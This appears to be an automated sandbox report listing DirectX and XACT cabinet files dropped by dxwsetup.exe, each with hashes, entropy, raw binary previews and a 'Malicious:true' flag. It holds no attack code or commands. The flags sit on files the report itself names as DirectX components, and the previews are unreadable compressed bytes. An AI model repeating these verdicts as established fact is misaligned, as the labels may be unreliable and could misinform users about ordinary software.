                                                                                              Preview:MSCF....P.......D...........................P....#..............w..............3g. .d3dx9_28_x64.cat..6:........35. .d3dx9_28.dll......U:....3. .infinst.exe......\;....39. .d3dx9_28_x64.inf.&...2_;....39. .dec2005_d3dx9_28_x64.inf...;..9..[.... &.m......R.P...?..R...A...8..(...J....H".VB....2.R.H..M.R.)U*.Rm .3.E#.....`.;..>.c..}.H...Nv .%@.mg..c....o:Ll...9...s...H..i\.e.t!..`....R.?.......@......F..o.......H0....vd.I1.x@.b..`.go.\..C...... .E.x l..xY.eHeE.."....o..J.....=...T..`....0o.(..%.Y&v...S...&.....h...HZ.2J.S^f1Xn.+.....WR....$B...H.......G...?y%.$....%?.A.%a...G]..F.sA./.-.R.7.f]@ ....t...D...9.....././....M/..A.yJ..\Io~I...G.......<Gt...7.!.g.".....t.r.w...f....N.6"4.>..A!.M.]u.~.G.^S..\/a../Y.=..u.U....d.i~.K7..<...e.b..G...~].....=isb?.fa6.._..p...X....P6<.k..[...l.`.........~/....D[c...'.]B..zE5...s..N].x..J.....h.&.,. p..an..I..w...y.....z".>.3_0.9. .....Z.U..3.=.......J.yHE.IU./!....._......O..`..%.0.X..5.jd.../bf..=(.**.....n.....Q.*..

                                                                                              C:\Windows\msdownld.tmp\AS463227.tmp\Feb2006_d3dx9_29_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1356836 bytes, 5 files, at 0x44 +A "d3dx9_29_x64.cat" +A "d3dx9_29.dll", flags 0x4, ID 6656, number 1, extra bytes 20 in head, 120 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1366004
                                                                                              Entropy (8bit):7.99967777757325
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:Qllh+6W44yAAf47xvIWTTbTpHe3Agqqvx3C86vBOZw1b4oWU+vz3zJvxfIc:Qh4DhlgWRHeQgtvx3FABOCth8vzN7
                                                                                              MD5:33618039DAC4E97C813E5BC1A499E6C6
                                                                                              SHA1:C792B9D0134DF698476C2FA4179DE6BCE8AA583B
                                                                                              SHA-256:A5FFAF9D58DA5D79402C4DC93E79960F971D2701D4651BB33D18925AF641F11D
                                                                                              SHA-512:35B490903721CA5FAEF73815D4F9C6F52EFAB1FE82A4FDBD7566A1B028525AFD29A72DC68D4B7D219CFA5CB33FEC241D6B2784F15F9795D368DC356B3DF30B5D
                                                                                              Malicious:true
                                                                                              Preview:MSCF....$.......D...........................$....#..............x.............C4.F .d3dx9_29_x64.cat..t:.......C4nE .d3dx9_29.dll......:...C45E .infinst.exe.......;...C4iF .d3dx9_29_x64.inf.&...2.;...C4iF .feb2006_d3dx9_29_x64.inf.l..3.9..[.... .q..@..$Q.P...>..$....)......2.k..LJ.].-.K+.E-h.k/Z.....Z..=....... b..=.o...........$.h...bT'7f.Q..2..;.o...M<C.u....xx..%..Z><..!_&'.Xq1E.Q...Q..[vP...d.I...........".(n(.....n.M....XA..J..C. ...c\*.....<......w.r..I.m..FM#....f..tdbdPR..Si:.:BQ...."..-.%...1U%.."Y..B.%.xF&S.V.<.).......6.^...D.(.eI.`.".p..?b..';.$..X.......H...$+...E....:_.b.(.0JF..E.w_..,..+.....$....+..AMBP..f.5..'....3 n.|...B ...0....t,.j.N..v}...WG.L.]..l....Q5..5..B.....X...^....U.~.x...%.....&wG/.5t.........T..G>.YjJ.].[..M^O......;.,.....]...1..__.K)sy...?.s.%.u.....a...!~..8.......F.^.%)N..c.J#....).`-.lz.T]..._..{..4...z?..p...H..%9)....y2.......S.{..h.K.....toRgh......D.V..%.?.|.?V.Vr1.......Jd..zz..C(.'...,.!.X.-..o....O...V!"..8..

                                                                                              C:\Windows\msdownld.tmp\AS463B2F.tmp\Feb2006_xact_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 126449 bytes, 5 files, at 0x44 +A "xact_x86.cat" +A "x3daudio1_0.dll", flags 0x4, ID 6923, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):135617
                                                                                              Entropy (8bit):7.992141777548868
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:EaLgbEzMsJxjJDOAfpPt4HvbVs/m2EKtaVNRF+kA5Y0L5XP/JwObYeM57H:LkgzfxjUWL/3EKtqNlGYeXqObkL
                                                                                              MD5:FEC720C0C15C43569EA9FAB7CEAFEA95
                                                                                              SHA1:C65235B40865725A00675F1BC013BA8B77307669
                                                                                              SHA-256:6456FC26622F3A72B9449ED0E61874CF1ADBA23CCCBFCDA1324F033FE0788FDA
                                                                                              SHA-512:8EDEE940930E3C610E709E2C6348ABAB479628BFAC71A0C507F46AF8D80F1F0C6E31C7C44AF5F884668CE472B281FF18CB44A97AB68232D455B7BC8F89A75268
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................! ........C4.F .xact_x86.cat..6..! ....C4-E .x3daudio1_0.dll.....V....C4CE .xactengine2_0.dll.3.........C4iF .feb2006_xact_x86.inf...........C4iF .xact_x86.inf......8..CK.|.\....l...X.".....Y2..ET.$..dd.$.........'...*....1..|;.b....=D0._.........{....twuUuuuUMw.-..1RR...{.;u.2.0... U*..U.U....4....s.7.T.(tJ..*.0.^..S8KIU.dQ(tvCdL...'G........{..%n...r.&....T....P...m0.....1{x.a..;.<0+..0[..0..8.x.'.<...r.Pv.Z..l...p.0..f..G.n.J.N...}.9@i...07..V....:.....8.'[...p(u....%...~.T*...R....D.Z.....Q....m.Y......1...%bq..ng..M..M.8....\/....D....M...A.+...zaK...$.8...d.%u....&5..9.....k(#=9@.._..3Nm..M.7......s...f'....... .')..).N....=..!.....HrDg..6.t.z..KxT.^....0.H..P.....[..Vv..jg.:."p.........a.A$.` ..'..0.....dgAw.qCc.,.K.|@.t...t6....8t...m.[..Hl7..K...[.m#.Z....~.%{a.6..t`...z....F... ..u..yK..,y.V!o...W.;.y.t.k.D..p./.Q)T*{..>.k...<.=H.V....c#...*[LFEZ0]I.:.....S...'..%s<.R.

                                                                                              C:\Windows\msdownld.tmp\AS4640BD.tmp\Feb2006_xact_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 172399 bytes, 6 files, at 0x44 +A "xact_x64.cat" +A "x3daudio1_0.dll", flags 0x4, ID 8042, number 1, extra bytes 20 in head, 14 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):181567
                                                                                              Entropy (8bit):7.99567918868168
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:d0F/biJLp9lt7vCmPW8+bobje8bRuaUDuHxiViqmFT8K9rz3a9cO2A2XSHao4svF:KqvlhXu8++q2WuHYrS8ky2A2XKJvub/I
                                                                                              MD5:582102046D298E7B439C819895F6061D
                                                                                              SHA1:09900F44668350118589F18C693B131D7C1F9238
                                                                                              SHA-256:C91A6380C65853E41E2F9593B954F3B5AF49BCC894476D8EB78CD9F8B6DD7DA4
                                                                                              SHA-512:8AABBCBC88489FF8828D532BE5C1BC0D33D7960F41C7B38348AAE73BA4777999F4358466D061DDD8291DBD434E7741EE2C3215A10F8287BE36209E0842C4EB2D
                                                                                              Malicious:true
                                                                                              Preview:MSCF....o.......D...............j...........o....#..................! ........C4.F .xact_x64.cat..@..! ....C4)E .x3daudio1_0.dll..l...`....C4OE .xactengine2_0.dll...........C45E .infinst.exe.z.........C4jF .feb2006_xact_x64.inf...........C4jF .xact_x64.inf.....&9..[.........R.P...O....5p.R...1.!..).a. G7...QJ.........%.G*$...Q.....D..h....v.....f.........q.lv...7.(s@.1.;i..R..7....9+.t<.F.1.84.D...{........f.......iYFdP.Dc.xG.. .0...;...B/IN..x/.w.b..]I... .WAJ.......6....J.8..@.....r.s..NV.#..D.+.c.Y....WQ....'..)`..,.BR.8+I..@....L.9.......8......y...0.u.@...R.../..W.#F...Y].K..C.....t.<E....B... K...A.....<....2.@......f.....`...@x.'..Y.Ab.G]a..X..2.......B.Z.i.../.z...+F.....w..:.+t......e...y.=.a......z.} ..(.{............~|....._Ai=..m.7..s.%...C.H.m.I..PA..O.$..g..PG.2.....5.\...P0.....z.a..#..?m....%.B...T.......v.u..E....3t...G.^......Q..+0..Q...t.....J...!......Y..+....y.w.".Z.@............P`......G....$t..W.'.?....H.^z~./...p..V..I..X...$p..^...

                                                                                              C:\Windows\msdownld.tmp\AS46467A.tmp\Apr2006_d3dx9_30_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1391870 bytes, 5 files, at 0x44 +A "d3dx9_30_x64.cat" +A "d3dx9_30.dll", flags 0x4, ID 6646, number 1, extra bytes 20 in head, 123 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1401038
                                                                                              Entropy (8bit):7.999678252363499
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:qpSOf0NLgpl5UCjJlezBreTxpgDysu8tyDJhllXCQaXVVeOYa54Sx0HfWyRA7ydL:80xgpl5UCLezBrg4uDDJhlAQQn8Sk87a
                                                                                              MD5:5EC6F520F3AFCC6494AB0D43B690EBD4
                                                                                              SHA1:2359E14CB6DA44AA89A3815E905D6FFD81960D02
                                                                                              SHA-256:27D99894E2A68601F46487C9999723DC83BCC9C6F903F2E2622D05668035B015
                                                                                              SHA-512:9DB4A9581EDAE2681491D5E13228642737D0D186E0E1672B063482B2E699274ACFCB81DFA9631902E93E009ADC0BBD9447061830C8CE2FEAD6743E2D45AAED60
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....<......D............................<...#..............{..............44f .d3dx9_30_x64.cat...;........4!e .d3dx9_30.dll.......<....4.d .infinst.exe.&.....=....4.e .apr2006_d3dx9_30_x64.inf.......=....4.e .d3dx9_30_x64.inf..vs..9..[.... ..q..@..$Q.f...>....".}...W].}.uL.E.2H]..T.i%.h-...%ZX.<x{.ZX............GC......|/M...H....zh.n...S.0.I%&....E..Kq..g.....#..!+.....X.<.]..-N..1X.E.qg....6..O....{...Q.."..!"...M..R.ff.]...n...KG.x.T...{.@E1~.{@..+..f..}.EkQ.....B......Gg... ..E0.D.$. ...r.+.;Td4...2..........z..:J%..S.g.Z....._.).*.H...)!...T.....AA..b(.lH..-9&rp....9"r\..s..)........%..._2<..R.t..l>z.;...........3!..U..~..O....!.......\vo.%...q+.B.b2'.....z..W..A...5..B...6..B..B.....v.AZ....(....;.2..8.....M..is..mn.9..]..Ys.X"..&...R....S..........%.o.s./.P4......U..O.'.W...n-&H...(.9*:.x..zT9.(..D{L.....M.-.....N..U....n|.y......{r..Y.I......b.0..P....a..|..F:...)..U9=...g.........!y.........e.w...K.i.\.8Z....O..O.c.\.'...@./..!....aM.<.

                                                                                              C:\Windows\msdownld.tmp\AS465000.tmp\Apr2006_xact_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 127143 bytes, 5 files, at 0x44 +A "xact2_1_x86.cat" +A "x3daudio1_0.dll", flags 0x4, ID 7334, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):136311
                                                                                              Entropy (8bit):7.992811243778454
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:NqvFmCDJEmTNSPtjVgIc5Ul8IlTq3UJWaL6LHZF/U7a7b0qJFkd22ig3nQ1d7+Z/:NYmCyC5U+Il0yWYSMaXzkYQ3nWUZDuY
                                                                                              MD5:A2132A62F9AB0BDDC3207166DC014581
                                                                                              SHA1:53B19AC3E6C6752011BA641EE3C409ED10C95DD9
                                                                                              SHA-256:52C71C89CCC22FED3D7C985A22C464451AF34B63B3A26A3799BC25D881221EBC
                                                                                              SHA-512:76FABD7F440B6F9B409B0B2635EAD4EF332563A9BED738A722A7C6B9A077094154BF735CAF02C67191B08AB0A19FC03E05EF3D984F6E34DCF3BD587A05D2F424
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................! .........47f .xact2_1_x86.cat..6..! ....C4-E .x3daudio1_0.dll.....V.....4.d .xactengine2_1.dll.W..........4.e .apr2006_xact_x86.inf............4.e .xact2_1_x86.inf...9..8..CK.|.\....l...X.".....Y.. y......EVI..... *.rzz..D..t.b....EO...((.S.TL.....]............u........j.{h......E..Q..E9.u..R).n.\E.a.N..30<.~UI.L.B...R.r.U...YJ.. .B...F..W3V..,..L,.g.S.G...\+.f...I.z.t*.JK.s(F. +....f.yBn...cv.-.. 7......n..0....9.<Q...za.$...0..}...n.J.s..@|d.H.b.,....c1..K..1>&....p.....Xh.?,._[..X......q...GT*7..2....V.l.....<(;@..?O.9)...k.%..8.. ..<[..a.T*h.2..........H.#.h...Qp[w3.A...f.!..ew..l.v....~...=..=`....".......z..d|"n......Q.EE..p4&Zz........?..@4;...k....x.R.H...p uf.7.yA..)....wRf/.."!...l..5.C..+..W.>..Zy.qj.....(.....{....4....`,...^.p'R.l.F..qP....{.nc."..m....5.".i.7.q.R...d/..f6..l..Qo6.......Fb]yn..U..lE~T..]..}........[!.....F.P..'...S.....V...w+....)..W..2*.B.J..In\]\....p.P.OK.

                                                                                              C:\Windows\msdownld.tmp\AS4655FB.tmp\Apr2006_xact_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 173173 bytes, 6 files, at 0x44 +A "xact2_1_x64.cat" +A "x3daudio1_0.dll", flags 0x4, ID 8453, number 1, extra bytes 20 in head, 14 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):182341
                                                                                              Entropy (8bit):7.996367169399176
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:iP7n/mIkqSEiqQAK23yLLBIvm2dozls4yaqS0yaP/Y5UZEPnQ79:iPL+fRqQAD3Tvxd8l/zsg5UZEIp
                                                                                              MD5:6CA70CDB3FA575506BA4035E9A50D8E4
                                                                                              SHA1:A2A20F5F95A1AB293A188A55BF593A82EA0DCB7F
                                                                                              SHA-256:F82B2043B470BF0E711C3D05D758A379920340212437917B5D98AF0C14E7BFE0
                                                                                              SHA-512:A453CED526332ACE37861A0A862FFF3710EF74ED57965F28DD279F526A2F33C390E82FD2C49BEE75476E5B4C349C40A71EEE49EDAC720236A16780DFD700FE62
                                                                                              Malicious:true
                                                                                              Preview:MSCF....u.......D................!..........u....#..................! .........46f .xact2_1_x64.cat..@..! ....C4)E .x3daudio1_0.dll..`...`.....4.e .xactengine2_1.dll............4.d .infinst.exe............4.e .apr2006_xact_x64.inf............4.e .xact2_1_x64.inf.....9..[......Z..A.P%..?.....DIx?...=HG..R.62^...T)....:.A.8..;.$.(..8.-......(..{.m...w.{.M...H.a....:.\^.S-R....c...u.k.^..q...5.bbK.0i.w.U).........C3..0.............."..3}...n..n..H. .((...B.l..#*hp..(>.."-a.|.[TuB..1.V....L..B....^Pi..`.b.....Sx*C...%.$.!....L..`.A..4.f.\.a..s......319..2..0QP..j.&.P\.B..z.~.P..P..$O...pI....o.T.F.../.d..g4...@EX...$I.2.....r.....B...A.....:.....HH5.....h... ...^.3.T...w...;...n...H......M...R.*..W .y.H....GD...Q..%..........DJ.6.#.."G.}@/|.....-A....W.....J..d..1....'P.......|b.$.z..yL..Jg...._r..W....P5.Q`...qyy.. ..s..p.<[.fr!.uv:..3.Y..9j.#or.A.<..T....7*}.F..d.:.]......>..:...Qs...a.C-...3}..r...#AU..O?=.2.T...e...e......p.S...4.....`....9|..~R.I....

                                                                                              C:\Windows\msdownld.tmp\AS465B98.tmp\Jun2006_xact_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 127711 bytes, 5 files, at 0x44 +A "xact2_2_x86.cat" +A "x3daudio1_0.dll", flags 0x4, ID 7347, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):136903
                                                                                              Entropy (8bit):7.992894428315885
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:D12mlhVvEbdSlFHljhuz+iFmKtp5LW+pc7Y5EExt2KF3:DwkMhqjhuz+efdLy7YSEP2KF3
                                                                                              MD5:CFCCA19D60EC3D822ED5EC8BBADEC941
                                                                                              SHA1:AB0E87182877991810AF48F1478906C1E671829E
                                                                                              SHA-256:23495764ABA10FF35CF9D23AEEFFDF38716219D8A155AE29162F01F7FE6A30CF
                                                                                              SHA-512:2ACAEA2DE2D77BBE8206E8309D48A4CBA432D72FB9BDE2576BCE7A31EE29FDCB0D44C2B996E8DC21A31BCDB03C806E11AD53B74D9C4C972436D5202825900C01
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................! .........4=< .xact2_2_x86.cat..6..! ....C4-E .x3daudio1_0.dll......V.....4.; .xactengine2_2.dll.W..........4.; .jun2006_xact_x86.inf.....`......4.; .xact2_2_x86.inf.r....8..CK.|.\....l...Y.".....Y.(H^.@.`@$,.Jr...#..+.....'b.'f.......x;..S.TL.....]t.w...{.{..s...........8f.ZC..._.P4..y....R(......'.j...<.%.-k.....M).W..8...V.Y....2`O..>q....jO..1....;.\{...'.=...+-.....:`.....c..t..1o..`<..0G.y..e.r|..r>P..9.({C-.r.@..8~..qs...>6G.r.....@...]0/..Vl.....q....l....j..... .#...o..J.p.6..:w.>..W....iTFi)..<..s#.AX.&..dL.I.vG?.BM.t...._.X...a....%..Wd.*5.$.#{..?G..Gj..ds.._..7@.@JG.G~*]:.=v&..'u.......bb...`g......`..s.)?Rj;..K....#..Im(.....Lq.........'5..p...xl.^..!.05H..P._*.....hf..3c{.H..I|........DB...9.?1..y...}.&;..c......tl...w2..`.:......q{s......`"...R..p..W.p.....vc3...6A..;..v..`b.D..<W-o.....;.....jy.2...zm..t.n.R..B..G...Vq.....).:.M...Ha@...Q..N.0.N.......4`E....(....

                                                                                              C:\Windows\msdownld.tmp\AS466117.tmp\Jun2006_xact_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 174825 bytes, 6 files, at 0x44 +A "xact2_2_x64.cat" +A "x3daudio1_0.dll", flags 0x4, ID 8466, number 1, extra bytes 20 in head, 14 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):183993
                                                                                              Entropy (8bit):7.996017590596314
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:fC8YuRPaoTUX/SmAwGUGY+geIhVhbjF/kZ8FyQU02JhzqhA7J4rMgThmwQvzb7e:fCoJaoT8/2Z9YA+VhbR8Zwy3RimwQvzm
                                                                                              MD5:D404CCED69740A65A3051766A37D0885
                                                                                              SHA1:288818F41DA8AB694C846961294EE03D52AEA90D
                                                                                              SHA-256:5163AFA067FE2F076AB428DD368BA0A2CF6470457BA528A35E97BE40737A03C0
                                                                                              SHA-512:87998E67B359C2A0D4F05DC102F6C4DB4F260903385B7558A2C1A71436001D5B18F42B984E6B279A8197243593C385D41F51DE630FA31C5CA5140F6970F87657
                                                                                              Malicious:true
                                                                                              Preview:MSCF...........D................!..............#..................! .........4=< .xact2_2_x64.cat..@..! ....C4)E .x3daudio1_0.dll..g...`.....4.: .xactengine2_2.dll............4.: .infinst.exe.....!......4.; .jun2006_xact_x64.inf............4.; .xact2_2_x64.inf....&9..[.........R.P...?.p.v.K.......AA..;.vDB.*....xUt....=!)"yP..."C. h..F#.....P.l}.epD.....;....7..P...{s7......$.S..q.ce..g8V....&..F~............A.=.....HP@.cB<..FPT....^.......G.....;P.PBz...D...Y.$@..J....5W...%v..p ..D...7.f$)..HyIO.--z.{5.H.;.@Z.n...T)H..G...|....T.. ..!.u0.^..*...0$`...L8.]..h=..@...L....|...4=.z......l.H....h-..l..2P.].$.....v.7...]......K..=`..?......g.....................D*".0....X...0....m.....;..8.1..bCF..J....Mq......V..@...... ..bz..ox...7t...X.~...@...n...........+.V...{..x..(y../o....Q.TC.=..... h...S<J.1...Or...|O.........}.!..h(`.W...t.l....w.m.....1d......~?#..#.K../...."..y_...z$}..s..q.W.....6[.......*x.~H..(>%.R=.....7...=G...Q.........X./.......Ot.

                                                                                              C:\Windows\msdownld.tmp\AS466702.tmp\Aug2006_xact_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 131275 bytes, 5 files, at 0x44 +A "xact2_3_x86.cat" +A "x3daudio1_0.dll", flags 0x4, ID 7334, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):140443
                                                                                              Entropy (8bit):7.993872348182751
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:ZLkEev6VCdOQKPuF/p+emNC4J962LGMlPj6MoCW37gwND08:ZLkEeKCdsPufE59tLGMpxobsG08
                                                                                              MD5:E16F0875713956A6F9CD8C5ACAD36E51
                                                                                              SHA1:984B821EAEF3B549CE0B12F72A405A93E51A9DFE
                                                                                              SHA-256:31B16F93BE7F5F9BB78E9ECE6DA96565D50A0BC1F66B206B7A21C601A308DC53
                                                                                              SHA-512:DD626D5552EAF0C1DBD32BC4DD84811BACE74C6350EDDAC692D3C3E8C393F4A19C26E8F2932F54A14648448912E6B87C796C6EEB6DA9B2C55EC4565983B76189
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................................#..................! .........4.R .xact2_3_x86.cat..6..! ....C4-E .x3daudio1_0.dll......V.....4.K .xactengine2_3.dll.W..........4{R .aug2006_xact_x86.inf.....`......4{R .xact2_3_x86.inf..v`..8..CK.|.\S...M..ABS............ M....%J3...EP....]W,.X..............]El.;s..t............9s.3g.9wf.#.....W.X...K-..t..>.B.v..t..;....._...C.S.\.)%y.*...Y:.Z .B...<...M^..N....e..v5.]pWG7.+..7........2.<..=...`n..s.'..1w..R7x.!.A..u.H.0g.....~<H.....C.?@]1.......R...<.....m.M...I.B..L..c).....~.m;..M].L......].........+..GT*w..n....!. .3...0Gl .&..;....E..ZW...........+..,*..Z....#bG.v.2...R.~...`.p.....?.q......6.$[.+.8 .............V4...\|Q.Q.....A..^4*........A.o.,.....O/X..^..5.r.....XQ.iGh.|I...r.A:'.p!u.L>.\..i...HgN...)q..q7.c..w...Pbm..a.O%y.......X..ne....2. ...w...`.:..5....]p'.......X.k.Hv..nGR.x..p.-..f...lB.QG6.........`.yn..c..4m.].].]..cXI^....N.=..F.P...-.].....fj..w3n...)..W.r2*.".:&.1|..n..L.V.P"

                                                                                              C:\Windows\msdownld.tmp\AS466CA0.tmp\Aug2006_xact_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 176943 bytes, 6 files, at 0x44 +A "xact2_3_x64.cat" +A "x3daudio1_0.dll", flags 0x4, ID 8453, number 1, extra bytes 20 in head, 14 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):186111
                                                                                              Entropy (8bit):7.995685991314543
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:yglGrmTM3Ne3LnSYZr66OltMlRz/EFa6xoXJMOL7CmAvyl81g5K7VQLWRrZL:xESKSRr66OltMlWFa6xoMOL7vmGGCArN
                                                                                              MD5:4BA26F9DCCAEBD7BE849A076EC82D6FF
                                                                                              SHA1:42FB0D0089D8BC92735820F475968F59AF4E4365
                                                                                              SHA-256:13E7EB934A7596E7C3B7D8A0962E68DA841D9C73D154825DC982FF6D05CFF221
                                                                                              SHA-512:4E4FD8A31AC3C2F8CC66D434103C0097AB3FBE2C2E8140AAE2F95FC4AC1927AAE9CDCE8730DD7C4DAD785D9A653D90B0F914B258BB5695C68CA93F605AC82DD4
                                                                                              Malicious:true
                                                                                              Preview:MSCF..../.......D................!........../....#..................! .........4.R .xact2_3_x64.cat..@..! ....C4)E .x3daudio1_0.dll......`.....4.K .xactengine2_3.dll............4.K .infinst.exe.....!......4{R .aug2006_xact_x64.inf............4{R .xact2_3_x64.inf.+.{..9..[.........R.P...O...\7.$Hb...l...RI..(D7...G.)..0..J.zH)J.R..x$..H...........>>.evHh......;....d....xT6@'.u...Q.n...#s.......!.Pq...o...... ......X....,-....h... ......q..G.. ,.........(.~.CzJ8t.P..J.FHR|.D.........` d..PC/.N...I...<.'.o....8.t..t7.....Q.E%.J..8.l......t"....Z....&.(.p.:........n.ML.@..Ny........9......P'.|...w..@.{B!\.h.P.....:.G...t g.."..{.@'..u....z........|......#A..8.q....v..E@..g.@.~.\i@......`9..y.G..p._.b...C%K.....Y...6R3...v"..J.a>.Co.dcEOv&D:...~.A.Y..^......{.x........`n....].D~.E...(..^"..N'....W...g...?....9.}.?.....z.3q.......Y....AV.?_0.w[..F.......CU).76....6.O.C......|...I...@...|..bC..p.S......l... .H<.S.I. .f(..`*^..Y..W...._....0_...._9..yj.+X

                                                                                              C:\Windows\msdownld.tmp\AS46728B.tmp\Oct2006_d3dx9_31_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1406942 bytes, 5 files, at 0x44 +A "d3dx9_31_x64.cat" +A "d3dx9_31.dll", flags 0x4, ID 6653, number 1, extra bytes 20 in head, 124 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1416110
                                                                                              Entropy (8bit):7.999689455720137
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:DapRo0d7USayTXsV6ZMwksqb7CL7eRS3OnQdPIKoQZvkGVOxtWcjxWO3ehFWG492:DU+0wyTXsMiw+OORhQRdZLdc1BehFV4g
                                                                                              MD5:EDBA7BC2A22F3186420C271B7291DCA3
                                                                                              SHA1:65483DB4269BE348528FD205239B811D775421CA
                                                                                              SHA-256:4F5CFFA56FD44F7775F12FC511A1E3F030C05AC78484F6866B12B82979067C22
                                                                                              SHA-512:90A9FDAD3D7F933DA8C3731E42D262034907D8088B85D7100BE46C57DEF02B436C31EB9FF144B9D67FD931F92A1677EC0CD762D9AAF066BB026F139499BA3A66
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....w......D............................w...#..............|.............<5m. .d3dx9_31_x64.cat...<.......<5.. .d3dx9_31.dll.......<...<5.. .infinst.exe.....'.=...<5.. .d3dx9_31_x64.inf.&.....=...<5.. .oct2006_d3dx9_31_x64.inf...l.9..[.... .......$a.V...>.H.!D;..mw.U............u..J..kAE.-....Z..-..kZ..FFf.........w.......Z...UpO..\.>?D.uJ;..nq.....w.........6.......|.G&U....Z.*U!cZF.A!..&R.$......u........[(o.o..{...yr.0c..*R..:.*.&...b....?P.i....._..\....w..4z....)..z...d:..B.'|/....O.j..h..............G1.....|^l...2..'.J0*AT.H"..T...@].....|,.....;..9.RL...r...Z...}.....\j..*.UGZK.\ .t..K.-.... $.r.5...e...#...9@..%.X..`s.........o..O.`..5.&...........w.....P/;~ZA~&..D..Ao.z...GW.......$..+......_.R{...C....#?..5.`.....-.y.o/.a.[....[..x._.s....x9.~.N..|.kyU.............o.. .S...f...i....3...(,..SyKM1kdv...q.b<...e.{..K.....F...Z..d(s.....1.......v..K.H=H..%...=...~..m}.C......|..h.UV../.H+HS|...{.<...Q...3.P.U...Z.....O1>.:X.p..5

                                                                                              C:\Windows\msdownld.tmp\AS467BE2.tmp\Oct2006_xact_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 132057 bytes, 5 files, at 0x44 +A "xact2_4_x86.cat" +A "x3daudio1_1.dll", flags 0x4, ID 7347, number 1, extra bytes 20 in head, 9 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):141225
                                                                                              Entropy (8bit):7.994197909856769
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:s0cnkrYXa8cJVIajswPlOA//GNzLriX5MMP6:s0OkrcajIaw+neN+XaMy
                                                                                              MD5:4FD2B859952C008DE0542053B15BF0D1
                                                                                              SHA1:0800CEC84B51FC6362C871FAB87A09DB5C4AD6D4
                                                                                              SHA-256:F6B6EBC9C239C5263AAFAA63FD691DA5AA715E9C794D5FD663E86559D5C6AE56
                                                                                              SHA-512:D656C3BFE4593EA9084A5D09F0173C8F6B7D6229FC7E3F6757AC03089CFA94A7337BBEF0456785B79D777B976F5A8259056D2DDCFE0F74D78C304A02BCEE0AD8
                                                                                              Malicious:true
